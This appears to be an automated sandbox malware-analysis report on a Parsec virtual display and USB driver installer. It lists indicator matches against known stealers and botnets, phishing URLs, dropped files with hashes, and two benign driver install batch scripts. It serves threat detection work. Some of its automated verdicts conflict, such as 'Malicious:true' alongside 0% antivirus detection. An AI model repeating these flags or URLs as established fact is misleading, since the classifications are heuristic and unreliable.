                          • ifconfig.me/
                          file.exeGet hashmaliciousUnknownBrowse
                          • /
                          file.exeGet hashmaliciousUnknownBrowse
                          • /
                          L9ck4BoFjc.ps1Get hashmaliciousUnknownBrowse
                          • ifconfig.me/
                          a3d1ef821849f015365076467994986ebf47905ffcc4f16761d222e1155abd10ba229aa11e70694c70523e9cbfd0eba5.dllGet hashmaliciousUnknownBrowse
                          • ifconfig.me/ip
                          a3d1ef821849f015365076467994986ebf47905ffcc4f16761d222e1155abd10ba229aa11e70694c70523e9cbfd0eba5.dllGet hashmaliciousUnknownBrowse
                          • ifconfig.me/ip

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          ifconfig.meCreal.exeGet hashmaliciousCreal StealerBrowse
                          • 34.160.111.145
                          #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeGet hashmaliciousBlank Grabber, Creal StealerBrowse
                          • 34.160.111.145
                          mek_n_bat.batGet hashmaliciousUnknownBrowse
                          • 34.160.111.145
                          6Ek4nfs2y1.exeGet hashmaliciousPhoenixKeylogger, PureLog StealerBrowse
                          • 34.117.118.44
                          uJ5c4dQ44E.exeGet hashmaliciousUnknownBrowse
                          • 34.117.118.44
                          uJ5c4dQ44E.exeGet hashmaliciousUnknownBrowse
                          • 34.117.118.44
                          SecuriteInfo.com.Trojan.MulDrop26.50476.18658.7474.exeGet hashmaliciousUnknownBrowse
                          • 34.117.118.44
                          SecuriteInfo.com.Trojan.MulDrop26.50476.18658.7474.exeGet hashmaliciousUnknownBrowse
                          • 34.117.118.44
                          Jv7Z27rOoW.exeGet hashmaliciousUnknownBrowse
                          • 34.117.118.44
                          fp2e7a.wpc.phicdn.nethttp://7g.bumbleshrimp.comGet hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          https://us.services.docusign.net/webforms-ux/v1.0/forms/de9dbdc77cc2367bb50c45c4d2a0b8c4Get hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          http://subjectsfaintly.comGet hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          https://buycode.us/Get hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          http://badbutperfect.comGet hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          http://u48113141.ct.sendgrid.net/Get hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          https://vivantskincare.taplink.wsGet hashmaliciousHTMLPhisherBrowse
                          • 192.229.221.95
                          http://percentagesubsequentprosper.comGet hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          https://usps.com-qaze.xyz/lGet hashmaliciousUnknownBrowse
                          • 192.229.221.95

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          CLOUDFLARENETUSICBM.exeGet hashmaliciousXmrigBrowse
                          • 104.26.8.242
                          PO NO170300999.exeGet hashmaliciousMassLogger RATBrowse
                          • 188.114.96.3
                          http://bit.ly/UCEMPLGet hashmaliciousUnknownBrowse
                          • 1.1.1.1
                          https://us.services.docusign.net/webforms-ux/v1.0/forms/de9dbdc77cc2367bb50c45c4d2a0b8c4Get hashmaliciousUnknownBrowse
                          • 104.18.86.42
                          Hess-INV87796-9_588115125.docGet hashmaliciousUnknownBrowse
                          • 104.26.9.44
                          Hess-INV87796-9_588115125.docGet hashmaliciousUnknownBrowse
                          • 172.67.69.226
                          https://buycode.us/Get hashmaliciousUnknownBrowse
                          • 104.22.44.142
                          https://vivantskincare.taplink.wsGet hashmaliciousHTMLPhisherBrowse
                          • 104.17.25.14
                          sbafla - John Bradley your alert(s) workspace - to review - 11132024.msgGet hashmaliciousUnknownBrowse
                          • 188.114.97.3
                          ATGS-MMD-ASUSbotnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                          • 51.63.0.97
                          botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                          • 32.201.52.7
                          botnet.spc.elfGet hashmaliciousMirai, MoobotBrowse
                          • 57.185.6.240
                          https://us.services.docusign.net/webforms-ux/v1.0/forms/de9dbdc77cc2367bb50c45c4d2a0b8c4Get hashmaliciousUnknownBrowse
                          • 34.49.241.189
                          https://deltacapitalgroup.us11.list-manage.com/track/click?u=bf383f7aa25923d377aaa8ae2&id=d3424d590b&e=95f75804b2Get hashmaliciousUnknownBrowse
                          • 34.174.242.185
                          https://trckacbm.com/url/ver/714099389/2931216/e7443d1a99daced93ca033af62f22f12Get hashmaliciousUnknownBrowse
                          • 57.128.74.65
                          Pmendon.ext_Reord_Adjustment.docxGet hashmaliciousCaptcha PhishBrowse
                          • 34.168.114.70
                          botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                          • 48.123.197.206
                          aba5298f.msiGet hashmaliciousUnknownBrowse
                          • 34.49.241.189

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          a0e9f5d64349fb13191bc781f81f42e1c39-EmprisaMaldoc.rtfGet hashmaliciousUnknownBrowse
                          • 188.114.97.3
                          • 34.160.111.145
                          file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                          • 188.114.97.3
                          • 34.160.111.145
                          file.exeGet hashmaliciousLummaCBrowse
                          • 188.114.97.3
                          • 34.160.111.145
                          file.exeGet hashmaliciousLummaCBrowse
                          • 188.114.97.3
                          • 34.160.111.145
                          file.exeGet hashmaliciousLummaCBrowse
                          • 188.114.97.3
                          • 34.160.111.145
                          medk.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                          • 188.114.97.3
                          • 34.160.111.145
                          tab.dll.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                          • 188.114.97.3
                          • 34.160.111.145
                          file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                          • 188.114.97.3
                          • 34.160.111.145
                          file.exeGet hashmaliciousLummaCBrowse
                          • 188.114.97.3
                          • 34.160.111.145

                          Dropped Files

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Program Files\Parsec Virtual Display Driver\nefconw.exehttps://viture.com/windowsGet hashmaliciousUnknownBrowse
                            C:\Program Files\Parsec Virtual Display Driver\driver\mm.dllhttps://viture.com/windowsGet hashmaliciousUnknownBrowse

                              Created / dropped Files

                              C:\Program Files\Parsec Virtual Display Driver\driver\mm.cat

                              Download File
                              Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):11928
                              Entropy (8bit):7.349994571032463
                              Encrypted:false
                              SSDEEP:192:27bR3HCkJC9aJ9EwvZvhYC3kn5NQlO8X01k9z3AwkqY:aRJZvh3Un5KlO8R9zJkqY
                              MD5:1FE1FC7CC73FB17E995D65835D51CA94
                              SHA1:249ACF0A3A362B2163127BD76F6D4D6AA463297D
                              SHA-256:136E64AC07DCE5A3B4935D5A9C5CFE03983C0B3065F46A30A45536D5B1681D5C
                              SHA-512:31FE1BDCB5F243A6EECC40006FC70793BC5AEA9D95FFE449117CB67366F0F120C393716FFE93B65A73C8B2DFE02917F1D0DCF4CA62AA302FE685513B8CC80BDC
                              Malicious:false
                              Preview:0.....*.H..........0......1.0...`.H.e......0..Y..+.....7.....J0..F0...+.....7........"*.J. %.#..h..240125162720Z0...+.....7.....0..$0... ...[.....@... 0S.m.r3.~...{..T1..0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...d.l.l...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ...[.....@... 0S.m.r3.~...{..T0... 4..\.Wv1.~3...&..,....8.a".....1..0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...i.n.f...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... 4..\.Wv1.~3...&..,....8.a".....0.....".&.H.....u.3.SGZ.1z0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...d.l.l...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0.....zU.fA.1........U?.1z0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...i.n.f...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0.......0...0....+.....7......0.....S.u.b.m.i.s.s.i.o.n. .I.D......

                              C:\Program Files\Parsec Virtual Display Driver\driver\mm.dll

                              Download File
                              Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):173736
                              Entropy (8bit):6.232270251717221
                              Encrypted:false
                              SSDEEP:3072:3zx0G2cnU93aR9bN9m3KUrru7qqybewIvUZdRfCzzr/:3zS9w9m3KUHAVvUZWXz
                              MD5:F09967CC8CC9BF03612DDECB6BF86DAA
                              SHA1:166F8E3000B6A1E2B13B46E85B7559B9837B9AA7
                              SHA-256:96DB6AE2F950B56E52BE3E68F92893AFA94645EAE09FEA2ABD5DD1985758150A
                              SHA-512:190D2EDEA81C42A2D7A5BC69CB98F03368E702A5FCB3FC1DCD4E9C387687BAB542E4B0E5DE67292E8B8A7EFED7FD9E30D1EFDD35BCDFEA28417DE71DB0E13864
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Joe Sandbox View:
                              • Filename: , Detection: malicious, Browse
                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........._...1T..1T..1T..1T..1T.F4U..1T.F5U..1T.F2U..1T..4U..1T..T..1T..0U..1T..0T..1T..6U..1T..2U..1T..5U..1T.F4U..1T.F1U..1T.F.T..1T..T..1T.F3U..1TRich..1T................PE..d......e.........." ...&.............................................................{....`A........................................ E..L...lE.......................~...(......`...p-..8...........................0,..@............................................text....'.......(.................. ..`PAGE.........@.......,.............. ..`.rdata...O.......P..................@..@.data...."...P......................@....pdata...............H..............@..@_RDATA...............\..............@..@.rsrc................`..............@..@.reloc..`............z..............@..B........................................................................................................................

                              C:\Program Files\Parsec Virtual Display Driver\driver\mm.inf

                              Download File
                              Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):4122
                              Entropy (8bit):3.7080252993527285
                              Encrypted:false
                              SSDEEP:48:MoXx6bEEAkWfd6QxVO2X2iI+xCPOgbqGSW8nijzXk0m0hX:K4zDI+xCP1SW8niXX
                              MD5:D8030AFE09A2F984BE00389B31F7039B
                              SHA1:AB7A55FA6641CC31B0B7E70C8680BBBD553FC8A1
                              SHA-256:34DA9FF45C13577631F67E33D11B8A26E3D22CA685D00C388B6122A795800588
                              SHA-512:0787E9E95369686B20BCBDDB9FF984111C4ED53A064FC8F198691DB5C124DFBE1B1F4D434DBFD81482545B723C01325ED9BCC626F461191B3AE4095222DF10A6
                              Malicious:false
                              Preview:..;.....;. .m.m...i.n.f.....;.........[.V.e.r.s.i.o.n.].....S.i.g.n.a.t.u.r.e. .=. .".$.W.i.n.d.o.w.s. .N.T.$.".....C.l.a.s.s. .=. .D.i.s.p.l.a.y.....C.l.a.s.s.G.u.i.d. .=. .{.4.D.3.6.E.9.6.8.-.E.3.2.5.-.1.1.C.E.-.B.F.C.1.-.0.8.0.0.2.B.E.1.0.3.1.8.}.....C.l.a.s.s.V.e.r. .=. .2...0.....P.r.o.v.i.d.e.r. .=. .%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%.....C.a.t.a.l.o.g.F.i.l.e. .=. .m.m...c.a.t.....D.r.i.v.e.r.V.e.r. .=. .0.1./.2.5./.2.0.2.4.,.0...4.5...0...0.....P.n.p.L.o.c.k.d.o.w.n. .=. .1.........[.M.a.n.u.f.a.c.t.u.r.e.r.].....%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%. .=. .S.t.a.n.d.a.r.d.,.N.T.a.m.d.6.4.........[.S.t.a.n.d.a.r.d...N.T.a.m.d.6.4.].....%.D.e.v.i.c.e.N.a.m.e.%. .=. .P.a.r.s.e.c.V.D.A.D.e.v.i.c.e._.I.n.s.t.a.l.l.,. .R.o.o.t.\.P.a.r.s.e.c.\.V.D.A.........[.S.o.u.r.c.e.D.i.s.k.s.F.i.l.e.s.].....m.m...d.l.l. .=. .1.........[.S.o.u.r.c.e.D.i.s.k.s.N.a.m.e.s.].....1. .=. .%.D.i.s.k.N.a.m.e.%.........;. .=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=. .U.M.D.F. .D.e.v.i.c.e. .=.=.=.=.=.=.=.=.=.=.

                              C:\Program Files\Parsec Virtual Display Driver\mm.man

                              Download File
                              Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                              File Type:XML 1.0 document, ASCII text, with very long lines (331)
                              Category:dropped
                              Size (bytes):6536
                              Entropy (8bit):4.9696208551586025
                              Encrypted:false
                              SSDEEP:96:tK5BbfK9K3H5KSHtMLutn1LuK9xFTxRo0JpAfKOuKtetnJnwgYDxRUmqU21+WJp:ARfK9K9pnJnw1qm/21+WJp
                              MD5:481369808B1B657547BCD92A897C58C0
                              SHA1:847723989CF3C9C98B64549090E8260C922D9201
                              SHA-256:E6A9944CA554B25D67B47B4D0DFBADA6EA5AE7CB208B9EC09CFE6132BAB4600F
                              SHA-512:42E6E7332DC0A6B14B308A4F04F1AFDFCF950C6FCAA6609DD1730BD0A7AA6D764F56BE05A45E94877B6D4028E0A312029BAA7FA67F49D280F05A6FFE069D9E77
                              Malicious:false
                              Preview:<?xml version='1.0' encoding='utf-8' standalone='yes'?>.<instrumentationManifest xmlns="http://schemas.microsoft.com/win/2004/08/events" xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://schemas.microsoft.com/win/2004/08/events eventman.xsd">. <instrumentation>. <events>. <provider guid="{e0dde897-547a-4ab3-afa1-8ab6490f3563}" messageFileName="%WinDir%\System32\drivers\UMDF\mm.dll" name="Parsec Virtual Display Driver" resourceFileName="%WinDir%\System32\drivers\UMDF\mm.dll" symbol="DriverControlGuid">. <channels>. <importChannel chid="SYSTEM" name="System"/>. </channels>. <templates>. <template tid="tid_load_template">. <data inType="win:Pointer" name="DeviceObjPtr" outType="win:HexInt64"/>. <data inType="win:UInt32" name="Status" outType="win:NTSTATUS"/>. </templat

                              C:\Program Files\Parsec Virtual Display Driver\nefconw.exe

                              Download File
                              Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):588160
                              Entropy (8bit):6.412426868092969
                              Encrypted:false
                              SSDEEP:12288:o27GX/DYwTLMcdMcYsWpP86/6L94gsleElgEo0JFoG:o27GX/DYwTLMcdMcYtF8S6L94gslbOED
                              MD5:E9F2BC8C82AC755F47C7F89D1530F1A1
                              SHA1:7CE5938C4B8A3EB4DE49F7A7E34972F5F2ACFCB5
                              SHA-256:CF746D1B0BBB713993D4A90DCCD774C78D9FFF8C2BA5A054B6C8F56C77E1EEE1
                              SHA-512:86ED0A391D22631DA9BDC7EB9CB096BA4DE4C6619C6C4326030CB03D196B63E5AA156BAC264A48D5B4CDA7401844A3B5050259B41859D32E0C4D39B96913C2CE
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Joe Sandbox View:
                              • Filename: , Detection: malicious, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}B..9#f.9#f.9#f.r[e.3#f.r[c.#f.r[b.*#f.kVb.(#f.kVe.3#f.kVc.k#f..Vc.:#f.r[g.6#f.9#g.#f..Vo.=#f..V..8#f.9#..8#f..Vd.8#f.Rich9#f.................PE..d......d.........."......@...........f.........@.............................@......}.....`.............................................................x....p...I.......)... .......v..8....................x..(....v..8............P..8............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data....?...0...&... ..............@....pdata...I...p...J...F..............@..@.detourc.!......."..................@..@.detourd............................@..._RDATA..............................@..@.rsrc...x...........................@..@.reloc....... ......................@..B........................................................................................................

                              C:\Program Files\Parsec Virtual Display Driver\uninstall.exe

                              Download File
                              Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                              Category:dropped
                              Size (bytes):87168
                              Entropy (8bit):7.1566162661131685
                              Encrypted:false
                              SSDEEP:1536:l/T2X/jN2vxZz0DTHUpouvUpdbIMQZEB6d0I7w9xj:lbG7N2kDTHUpouvUpdbkZEEdBMX
                              MD5:A8482B15BD93524520814369536FECFA
                              SHA1:62242CEBCE6E5BB7737127B3D00A66F458A64391
                              SHA-256:1E30A0C0FB30C1B09007ABE48909FE05EFB055DBC0A917F4F29D37635319F243
                              SHA-512:B01FCC9F7CB1F7351062B85D6632CE60C80F8543074A8E95A5CF93C85A76D7CF5F870EC9FDCCC3E2ED959B914D315B34FF3307C8D3B469956925F8FFDC61FDF0
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................=.....@..........................................................+...)...........................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata.......`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                              C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat

                              Download File
                              Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                              File Type:DOS batch file, ASCII text
                              Category:dropped
                              Size (bytes):420
                              Entropy (8bit):5.190650906040986
                              Encrypted:false
                              SSDEEP:12:35CmSrNUiI+ss0z6qfr+iIq99Bz6qFLs91rdajREWV:3+rtIXHzRrNIq99BzsbrcjV
                              MD5:EE1BFB5CCBB3949E3258155E141A68A5
                              SHA1:B79DD1E75E3E7ACD8D21D7B17C86673A6C6383D9
                              SHA-256:1E7C35EB6C296F96AEE5AE4BBBD40395E8019BDE95EF9BEF91260DD8EF03C6D1
                              SHA-512:B37D680F5DAB52536926C718EB1B4C1F0E78552C061756F998E3A3CCB2DC4FBEA15DD1A4B181646A68A2987A22CE225C185C2EF2BB1D10A70C780ADA8CF9F9AA
                              Malicious:false
                              Preview:@echo off.@setlocal..set MYDIR=%~dp0.pushd "%MYDIR%"..start /wait .\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318".start /wait .\nefconw.exe --create-device-node --class-name Display --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" --hardware-id Root\Parsec\VDA.start /wait .\nefconw.exe --install-driver --inf-path ".\driver\mm.inf"..popd.endlocal.

                              C:\Program Files\Parsec Virtual Display Driver\vdduninstall.bat

                              Download File
                              Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                              File Type:DOS batch file, ASCII text
                              Category:dropped
                              Size (bytes):272
                              Entropy (8bit):5.213077826331079
                              Encrypted:false
                              SSDEEP:6:h1d4RPXKB1imilr6cuIUiItAns0NS/zCSm/1Iffr6c6Bux3jEkEWV:35CmSrNUiI+ss0z6qfrkajREWV
                              MD5:FBC8D5E19F89DFFCCD165F44ABF114B4
                              SHA1:A07501EA396A4E29654352CF8ED71C7819109E5D
                              SHA-256:8F503E40A32959D9D2EE5A9E2A3DA627F6ED158E6C87C47EF17F1E5D74F47B9A
                              SHA-512:08739F57B74EA457F505D416C5CC6C50539343EE33E80D76B95CA1A9B8760EAEF9E97712A5824D8C22A7287C819149A6B60E6A08511E292CAC71EF064AD168F6
                              Malicious:false
                              Preview:@echo off.@setlocal..set MYDIR=%~dp0.pushd "%MYDIR%"..start /wait .\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318".start /wait .\nefconw.exe --uninstall-driver --inf-path ".\driver\mm.inf"..popd.endlocal.

                              C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe

                              Download File
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:PE32+ executable (console) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):596352
                              Entropy (8bit):6.420504136477356
                              Encrypted:false
                              SSDEEP:12288:qmTp2f8iWOZiu7uRt3eWuHE0e14BdpfVuW70q2cJto9VuZHPq:nTp2f8iWOZiu7uRt3nIE0+4BdpfVuW7Q
                              MD5:DDDEE00430F7A3D52580B7C85D63D9DC
                              SHA1:FF3B7A60062EF85186EA305168CC9BC207A0C5B0
                              SHA-256:002CBD46BBFAA2D9E04A578F7200711B5740BDA119166F111E2590D8B19D3E68
                              SHA-512:FAAC2F9135AA58DDAB6391D4711498A45F51A0429040833AEA8D1F0F7C64EF27435C8A2D9C3E49C8BC8BDFEC276CA455A719E2B401EA34994D57483C8FEFE5BA
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|.8..ek..ek..ek.efj..ek.e`jy.ek.eaj..ek.haj..ek.hfj..ek.h`j..ek.h`j..ek.edj..ek..dkl.ek.hlj..ek.h.k..ek...k..ek.hgj..ekRich..ek........PE..d....d.........."......Z...........n.........@.............................p............`..................................................>.......@..x........I.......)...P..........8.......................(.......8............p..0............................text....Y.......Z.................. ..`.rdata..~....p.......^..............@..@.data....?...`...&...@..............@....pdata...I.......J...f..............@..@.detourc.!......."..................@..@.detourd..... ......................@..._RDATA.......0......................@..@.rsrc...x....@......................@..@.reloc.......P......................@..B................................................................................................................

                              C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe

                              Download File
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):588160
                              Entropy (8bit):6.412426868092969
                              Encrypted:false
                              SSDEEP:12288:o27GX/DYwTLMcdMcYsWpP86/6L94gsleElgEo0JFoG:o27GX/DYwTLMcdMcYtF8S6L94gslbOED
                              MD5:E9F2BC8C82AC755F47C7F89D1530F1A1
                              SHA1:7CE5938C4B8A3EB4DE49F7A7E34972F5F2ACFCB5
                              SHA-256:CF746D1B0BBB713993D4A90DCCD774C78D9FFF8C2BA5A054B6C8F56C77E1EEE1
                              SHA-512:86ED0A391D22631DA9BDC7EB9CB096BA4DE4C6619C6C4326030CB03D196B63E5AA156BAC264A48D5B4CDA7401844A3B5050259B41859D32E0C4D39B96913C2CE
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}B..9#f.9#f.9#f.r[e.3#f.r[c.#f.r[b.*#f.kVb.(#f.kVe.3#f.kVc.k#f..Vc.:#f.r[g.6#f.9#g.#f..Vo.=#f..V..8#f.9#..8#f..Vd.8#f.Rich9#f.................PE..d......d.........."......@...........f.........@.............................@......}.....`.............................................................x....p...I.......)... .......v..8....................x..(....v..8............P..8............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data....?...0...&... ..............@....pdata...I...p...J...F..............@..@.detourc.!......."..................@..@.detourd............................@..._RDATA..............................@..@.rsrc...x...........................@..@.reloc....... ......................@..B........................................................................................................

                              C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.cat

                              Download File
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):11858
                              Entropy (8bit):7.334407083811773
                              Encrypted:false
                              SSDEEP:192:1zQ2L1BJCdnEwKUNhYCxTBm+0U8X01k9z3AGTObrQ:1PlUNh3xTBmo8R9zNKo
                              MD5:560EFA3FA6E5AB486D958B12207AC6ED
                              SHA1:69B8EBE8AE3D9AF94886DC1C9C52FC858B5AFFAB
                              SHA-256:16DB056748CAEB3B2D6ABBF9F6C77F34DD0F81D3BBF4E65DA2EE4F2FD0B55681
                              SHA-512:A4761740090CDBA84CDA9E9A805C695567B6ED5C79AB339DA315679124B7C9F05CC0B2DE53DFB58D133CE67F30F5DDE5A20C2F2A1330C9C8F4A85ABDD674456F
                              Malicious:false
                              Preview:0..N..*.H.........?0..;...1.0...`.H.e......0.....+.....7.....r0..n0...+.....7......i.h..!M.K6..kB...240306184122Z0...+.....7.....0...0.....oX0o ...Vg...$.-. .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0.... 'Fd....#...m0cJ..0.........d..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... 'Fd....#...m0cJ..0.........d..0..........U..,...\.#.s..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0.... ...."..3..6F......$rY..T....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0U..+.....7...1G0E0...+.....7.......010...

                              C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.inf

                              Download File
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):1311
                              Entropy (8bit):5.255673591625164
                              Encrypted:false
                              SSDEEP:24:fWHjKOUPiE492k6StyO8rKd8tYxrCddcdg1xOjLtxlDxXL6qVt5poZQxWx00:092iEu2kmO/wYxefc61xOjLtxRxWq35y
                              MD5:AC423F3B285C615E7BEC73DC2FA71D20
                              SHA1:A508A10AD7DE55F0EC2CE9C4135CE623B773BF1D
                              SHA-256:E31AEFF7229AD9B63394FB3646F7DFDDE2EA8BBE8B247259A5A9548FE3CD89E3
                              SHA-512:FF2ECBA42697815F906D4E5501F9C4B33CD5652432DFB26302644AD385B40E361C32E0120603002D93DC12B0C38E081D5FF0CCE6145A0420BA0EE70A22FE3B07
                              Malicious:false
                              Preview:;..; Parsec Virtual DS USB filter driver for fixing UDE compatibility with USBAUDIO.SYS..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36FC9E60-C465-11CF-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvirtualds.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvirtualds.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..parsecvirtualds.DriverFiles = 12....[DefaultInstall.NTamd64]..OptionDesc = %parsecvirtualdsServiceDesc%..CopyFiles = parsecvirtualds.DriverFiles....[DefaultUninstall.NTamd64]..LegacyUninstall = 1....[parsecvirtualds.DriverFiles]..parsecvirtualds.sys....[DefaultInstall.NTamd64.Services]..AddService = %parsecvirtualdsServiceName%,,parsecvirtualds.Service....[parsecvirtualds.Service]..DisplayName = %parsecvirtualdsServiceName%..Description = %parsecvirtualdsServiceDesc%..ServiceBinary = %12%\parsecvirtualds.sys..ServiceType = 1 ; SERVICE_KERNEL_DRI

                              C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.sys

                              Download File
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:PE32+ executable (native) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):26680
                              Entropy (8bit):6.39482709996269
                              Encrypted:false
                              SSDEEP:384:OOq45ajAwai+E3n5bWbkcBnqRTjdfHpl1eUNh3YDX+iR9zYjI:O/45al/RcVw1Hf1zH3YDuO9zyI
                              MD5:0790B2E5B9D6B38B566C6BC796F0364A
                              SHA1:1C87512273F9E98E43EA1B048A67995A93E02B4E
                              SHA-256:4B98D337ED94646D10BDB0395A29D10DCAC50C660C5176C1937A823301BD6CA1
                              SHA-512:03A8E2BE9C98385EC13CDE7EE321AB73235289DE22DEB1029B795392B90A447DFA46182D40CBBC091B39AB0DF8F5A8E9FC7A80F1D839F36EC8C678BDF746844E
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"..C..C..C..;..C..C..C..;..C..C..C..;..C..;..C.....C...5..C.....C.Rich.C.........................PE..d...o..e.........."....&.&..........p..........@....................................[.....`A.................................................q..P............P.......@..8(......<...`5..8........................... 4..@............0...............................text............................... ..h.rdata.......0......................@..H.data........@.......&..............@....pdata.......P.......(..............@..HPAGE....l....`.......*.............. ..`INIT...."....p.......4.............. ..b.rsrc................:..............@..B.reloc..<............>..............@..B........................................................................................................................................................................

                              C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.cat

                              Download File
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):12001
                              Entropy (8bit):7.346082125667387
                              Encrypted:false
                              SSDEEP:192:0SWbYOAJCanEwKUNhYCaKJ8RwX01k9z3AmSSk:dGUNh31J9R9zvSSk
                              MD5:CFE9C8FD6FAF915A653D39895D3D0862
